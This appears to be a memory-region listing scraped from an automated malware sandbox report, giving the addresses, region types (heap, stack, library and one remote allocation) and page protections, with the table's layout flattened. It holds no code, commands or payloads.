|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6308000
|
heap
|
page read and write
|
||
|
529E000
|
stack
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6081000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
AE35000
|
heap
|
page read and write
|
||
|
A8D0000
|
heap
|
page read and write
|
||
|
ACD6000
|
heap
|
page read and write
|
||
|
AD33000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7352000
|
heap
|
page read and write
|
||
|
CD9F000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
AC43000
|
heap
|
page read and write
|
||
|
AC48000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
70FE000
|
stack
|
page read and write
|
||
|
33B0000
|
heap
|
page read and write
|
||
|
ABB1000
|
heap
|
page read and write
|
||
|
776D000
|
stack
|
page read and write
|
||
|
7870000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
85BE000
|
stack
|
page read and write
|
||
|
AD17000
|
heap
|
page read and write
|
||
|
4C7E000
|
stack
|
page read and write
|
||
|
4FEE000
|
stack
|
page read and write
|
||
|
84F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
AD21000
|
heap
|
page read and write
|
||
|
4E60000
|
trusted library allocation
|
page read and write
|
||
|
6307000
|
heap
|
page read and write
|
||
|
ABB5000
|
heap
|
page read and write
|
||
|
AC89000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
7E80000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
49D0000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
A7B1000
|
heap
|
page read and write
|
||
|
ACD5000
|
heap
|
page read and write
|
||
|
8AC1000
|
heap
|
page read and write
|
||
|
319E000
|
stack
|
page read and write
|
||
|
AD32000
|
heap
|
page read and write
|
||
|
AD48000
|
heap
|
page read and write
|
||
|
CB11000
|
trusted library allocation
|
page read and write
|
||
|
52C0000
|
trusted library allocation
|
page read and write
|
||
|
33A0000
|
trusted library section
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
7220000
|
trusted library allocation
|
page read and write
|
||
|
4D86000
|
trusted library allocation
|
page execute and read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
4D7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
550E000
|
stack
|
page read and write
|
||
|
AD8E000
|
heap
|
page read and write
|
||
|
E511000
|
trusted library allocation
|
page read and write
|
||
|
AD1F000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
ABBB000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
CB61000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
A855000
|
heap
|
page read and write
|
||
|
7CB0000
|
trusted library allocation
|
page read and write
|
||
|
ABB0000
|
heap
|
page read and write
|
||
|
5081000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
3020000
|
heap
|
page read and write
|
||
|
35AE000
|
stack
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
ABB7000
|
heap
|
page read and write
|
||
|
B491000
|
trusted library allocation
|
page read and write
|
||
|
ABB2000
|
heap
|
page read and write
|
||
|
33BF000
|
heap
|
page read and write
|
||
|
AC5A000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
76AA000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
4F6B000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
452000
|
remote allocation
|
page execute and read and write
|
||
|
85D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4E20000
|
trusted library allocation
|
page read and write
|
||
|
6429000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
AD47000
|
heap
|
page read and write
|
||
|
9411000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
4E39000
|
trusted library allocation
|
page read and write
|
||
|
8A80000
|
heap
|
page read and write
|
||
|
4EF8000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
71F0000
|
trusted library allocation
|
page read and write
|
||
|
6401000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
88BA000
|
heap
|
page read and write
|
||
|
51CD000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6308000
|
heap
|
page read and write
|
||
|
31DE000
|
stack
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
8900000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A35000
|
trusted library allocation
|
page read and write
|
||
|
ACD6000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
74CB000
|
stack
|
page read and write
|
||
|
71D0000
|
trusted library allocation
|
page read and write
|
||
|
ACE7000
|
heap
|
page read and write
|
||
|
52BF000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
AC6A000
|
heap
|
page read and write
|
||
|
AA70000
|
trusted library allocation
|
page read and write
|
||
|
330E000
|
heap
|
page read and write
|
||
|
3104000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7201000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
AC7C000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
4E70000
|
trusted library allocation
|
page execute and read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
53E0000
|
trusted library allocation
|
page read and write
|
||
|
ABB9000
|
heap
|
page read and write
|
||
|
6CE1000
|
trusted library allocation
|
page read and write
|
||
|
2C5F000
|
unkown
|
page read and write
|
||
|
ACF7000
|
heap
|
page read and write
|
||
|
595C000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
AD11000
|
heap
|
page read and write
|
||
|
4D80000
|
trusted library allocation
|
page read and write
|
||
|
77FB000
|
heap
|
page read and write
|
||
|
ABB4000
|
heap
|
page read and write
|
||
|
AC7B000
|
heap
|
page read and write
|
||
|
6308000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
77AB000
|
stack
|
page read and write
|
||
|
8500000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
88C6000
|
heap
|
page read and write
|
||
|
7350000
|
heap
|
page read and write
|
||
|
8AA4000
|
heap
|
page read and write
|
||
|
AE3E000
|
heap
|
page read and write
|
||
|
730E000
|
stack
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
77FE000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
AC51000
|
heap
|
page read and write
|
||
|
AA91000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
7B4F000
|
heap
|
page read and write
|
||
|
304A000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
ABB2000
|
heap
|
page read and write
|
||
|
7B40000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
52C4000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
A8AA000
|
heap
|
page read and write
|
||
|
4E5B000
|
heap
|
page read and write
|
||
|
8ABA000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
8EF0000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
7240000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7EE0000
|
trusted library allocation
|
page read and write
|
||
|
AC6D000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6228000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
7920000
|
trusted library allocation
|
page execute and read and write
|
||
|
A5BE000
|
heap
|
page read and write
|
||
|
85E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
52C8000
|
trusted library allocation
|
page read and write
|
||
|
ABBE000
|
heap
|
page read and write
|
||
|
84C4000
|
stack
|
page read and write
|
||
|
EBA3000
|
trusted library allocation
|
page read and write
|
||
|
ABB6000
|
heap
|
page read and write
|
||
|
ABB1000
|
heap
|
page read and write
|
||
|
AC6E000
|
heap
|
page read and write
|
||
|
85C0000
|
heap
|
page read and write
|
||
|
7F10000
|
trusted library allocation
|
page read and write
|
||
|
ABB2000
|
heap
|
page read and write
|
||
|
71CB000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
4DD0000
|
heap
|
page read and write
|
||
|
AC94000
|
heap
|
page read and write
|
||
|
ABB1000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
AA80000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
ADE5000
|
heap
|
page read and write
|
||
|
AC5C000
|
heap
|
page read and write
|
||
|
AE39000
|
heap
|
page read and write
|
||
|
ABB6000
|
heap
|
page read and write
|
||
|
3405000
|
heap
|
page read and write
|
||
|
60E8000
|
trusted library allocation
|
page read and write
|
||
|
AD55000
|
heap
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
DB11000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
AC72000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
AD5E000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
301E000
|
stack
|
page read and write
|
||
|
ACD6000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
AC43000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
ACF1000
|
heap
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
537E000
|
stack
|
page read and write
|
||
|
718D000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7B4B000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
AA40000
|
trusted library allocation
|
page execute and read and write
|
||
|
788E000
|
stack
|
page read and write
|
||
|
487E000
|
stack
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
53F0000
|
heap
|
page read and write
|
||
|
49F0000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
ADD4000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
AD4C000
|
heap
|
page read and write
|
||
|
ABC5000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
AC52000
|
heap
|
page read and write
|
||
|
A649000
|
heap
|
page read and write
|
||
|
760E000
|
stack
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
7D9E000
|
stack
|
page read and write
|
||
|
4C2F000
|
stack
|
page read and write
|
||
|
7880000
|
heap
|
page execute and read and write
|
||
|
AD3E000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
5035000
|
heap
|
page execute and read and write
|
||
|
4E30000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
4E50000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
4F4A000
|
trusted library allocation
|
page read and write
|
||
|
4E67000
|
trusted library allocation
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
ADA9000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
52A2000
|
trusted library allocation
|
page read and write
|
||
|
25FB000
|
stack
|
page read and write
|
||
|
88F0000
|
heap
|
page read and write
|
||
|
4E9E000
|
trusted library allocation
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
AC48000
|
heap
|
page read and write
|
||
|
AE44000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
4D82000
|
trusted library allocation
|
page read and write
|
||
|
ACE3000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
9A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
6409000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
5CC8000
|
trusted library allocation
|
page read and write
|
||
|
AC44000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
ADBA000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
CDF1000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
AC70000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
28BE000
|
unkown
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
2A3B000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
7BA0000
|
heap
|
page read and write
|
||
|
7EC0000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
29D8000
|
heap
|
page read and write
|
||
|
AE13000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
A649000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
AD6F000
|
heap
|
page read and write
|
||
|
783A000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
ABB8000
|
heap
|
page read and write
|
||
|
AD1A000
|
heap
|
page read and write
|
||
|
EB88000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
AC61000
|
heap
|
page read and write
|
||
|
7CB6000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
9A10000
|
trusted library allocation
|
page read and write
|
||
|
AD7E000
|
heap
|
page read and write
|
||
|
57A5000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
52A0000
|
trusted library allocation
|
page read and write
|
||
|
4E50000
|
trusted library allocation
|
page read and write
|
||
|
8920000
|
trusted library allocation
|
page read and write
|
||
|
7E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
89D0000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
7A7F000
|
heap
|
page read and write
|
||
|
8A9C000
|
heap
|
page read and write
|
||
|
AC56000
|
heap
|
page read and write
|
||
|
7B90000
|
heap
|
page execute and read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
6307000
|
heap
|
page read and write
|
||
|
4F20000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
898D000
|
stack
|
page read and write
|
||
|
4CDE000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
77E1000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
35F0000
|
heap
|
page read and write
|
||
|
AC80000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
79CE000
|
stack
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
766D000
|
stack
|
page read and write
|
||
|
63C2000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
3089000
|
heap
|
page read and write
|
||
|
7846000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
29C3000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
AD34000
|
heap
|
page read and write
|
||
|
AD38000
|
heap
|
page read and write
|
||
|
77B6000
|
heap
|
page read and write
|
||
|
6225000
|
trusted library allocation
|
page read and write
|
||
|
4E71000
|
trusted library allocation
|
page read and write
|
||
|
AC6F000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
5561000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
2A55000
|
heap
|
page read and write
|
||
|
AD64000
|
heap
|
page read and write
|
||
|
ABB5000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
2930000
|
heap
|
page read and write
|
||
|
AD2F000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
71E0000
|
trusted library allocation
|
page read and write
|
||
|
660C000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6307000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
7CA0000
|
trusted library allocation
|
page read and write
|
||
|
ABB7000
|
heap
|
page read and write
|
||
|
6302000
|
heap
|
page read and write
|
||
|
ABB0000
|
heap
|
page read and write
|
||
|
291E000
|
stack
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
ABB8000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7E1D000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
AC81000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
AD59000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
50E3000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
79BD000
|
stack
|
page read and write
|
||
|
791D000
|
stack
|
page read and write
|
||
|
29DB000
|
heap
|
page read and write
|
||
|
798E000
|
stack
|
page read and write
|
||
|
3365000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
88B6000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
546A000
|
trusted library allocation
|
page read and write
|
||
|
29BE000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
325C000
|
stack
|
page read and write
|
||
|
ACFA000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
8EAC000
|
stack
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
4D79000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
4D90000
|
trusted library allocation
|
page read and write
|
||
|
8A11000
|
trusted library allocation
|
page read and write
|
||
|
7B10000
|
heap
|
page read and write
|
||
|
AC75000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
2935000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
ABB3000
|
heap
|
page read and write
|
||
|
ABB2000
|
heap
|
page read and write
|
||
|
4D92000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7570000
|
trusted library section
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
6308000
|
heap
|
page read and write
|
||
|
8A90000
|
heap
|
page read and write
|
||
|
4FAE000
|
stack
|
page read and write
|
||
|
85F0000
|
trusted library allocation
|
page read and write
|
||
|
ABBB000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
ABB9000
|
heap
|
page read and write
|
||
|
5380000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
ADFC000
|
heap
|
page read and write
|
||
|
49F7000
|
heap
|
page read and write
|
||
|
EB7D000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7210000
|
trusted library allocation
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
AC63000
|
heap
|
page read and write
|
||
|
ABBD000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
AF7F000
|
heap
|
page read and write
|
||
|
2920000
|
heap
|
page read and write
|
||
|
AC81000
|
heap
|
page read and write
|
||
|
6467000
|
trusted library allocation
|
page read and write
|
||
|
ACD7000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
7595000
|
heap
|
page execute and read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
4CE0000
|
heap
|
page read and write
|
||
|
AD67000
|
heap
|
page read and write
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
25BB000
|
stack
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
AE2B000
|
heap
|
page read and write
|
||
|
ABB5000
|
heap
|
page read and write
|
||
|
4DEE000
|
stack
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
ABB1000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
7A96000
|
heap
|
page read and write
|
||
|
71EA000
|
trusted library allocation
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
5388000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
8600000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
ABB0000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
87CE000
|
stack
|
page read and write
|
||
|
6308000
|
heap
|
page read and write
|
||
|
4F10000
|
trusted library allocation
|
page read and write
|
||
|
743E000
|
stack
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
CB0C000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
4F0E000
|
stack
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
77C6000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
630D000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
533E000
|
stack
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
4EAD000
|
trusted library allocation
|
page read and write
|
||
|
AD04000
|
heap
|
page read and write
|
||
|
4D64000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
ACF5000
|
heap
|
page read and write
|
||
|
A7B1000
|
heap
|
page read and write
|
||
|
EB8C000
|
trusted library allocation
|
page read and write
|
||
|
4D50000
|
trusted library allocation
|
page read and write
|
||
|
315E000
|
stack
|
page read and write
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
4E6D000
|
trusted library allocation
|
page read and write
|
||
|
AD7E000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7EA0000
|
trusted library allocation
|
page read and write
|
||
|
ABB4000
|
heap
|
page read and write
|
||
|
AD9F000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
4E60000
|
trusted library allocation
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
AC60000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
7770000
|
heap
|
page read and write
|
||
|
2A2F000
|
heap
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
A7B1000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
ABBA000
|
heap
|
page read and write
|
||
|
6310000
|
heap
|
page read and write
|
||
|
AC8C000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
7A70000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
7B27000
|
heap
|
page read and write
|
||
|
6305000
|
heap
|
page read and write
|
||
|
6309000
|
heap
|
page read and write
|
||
|
6303000
|
heap
|
page read and write
|
||
|
60A6000
|
trusted library allocation
|
page read and write
|
||
|
AC76000
|
heap
|
page read and write
|
||
|
4F0F000
|
trusted library allocation
|
page read and write
|
||
|
35EE000
|
stack
|
page read and write
|
||
|
4D63000
|
trusted library allocation
|
page execute and read and write
|
There are 1008 hidden memdumps, click here to show them.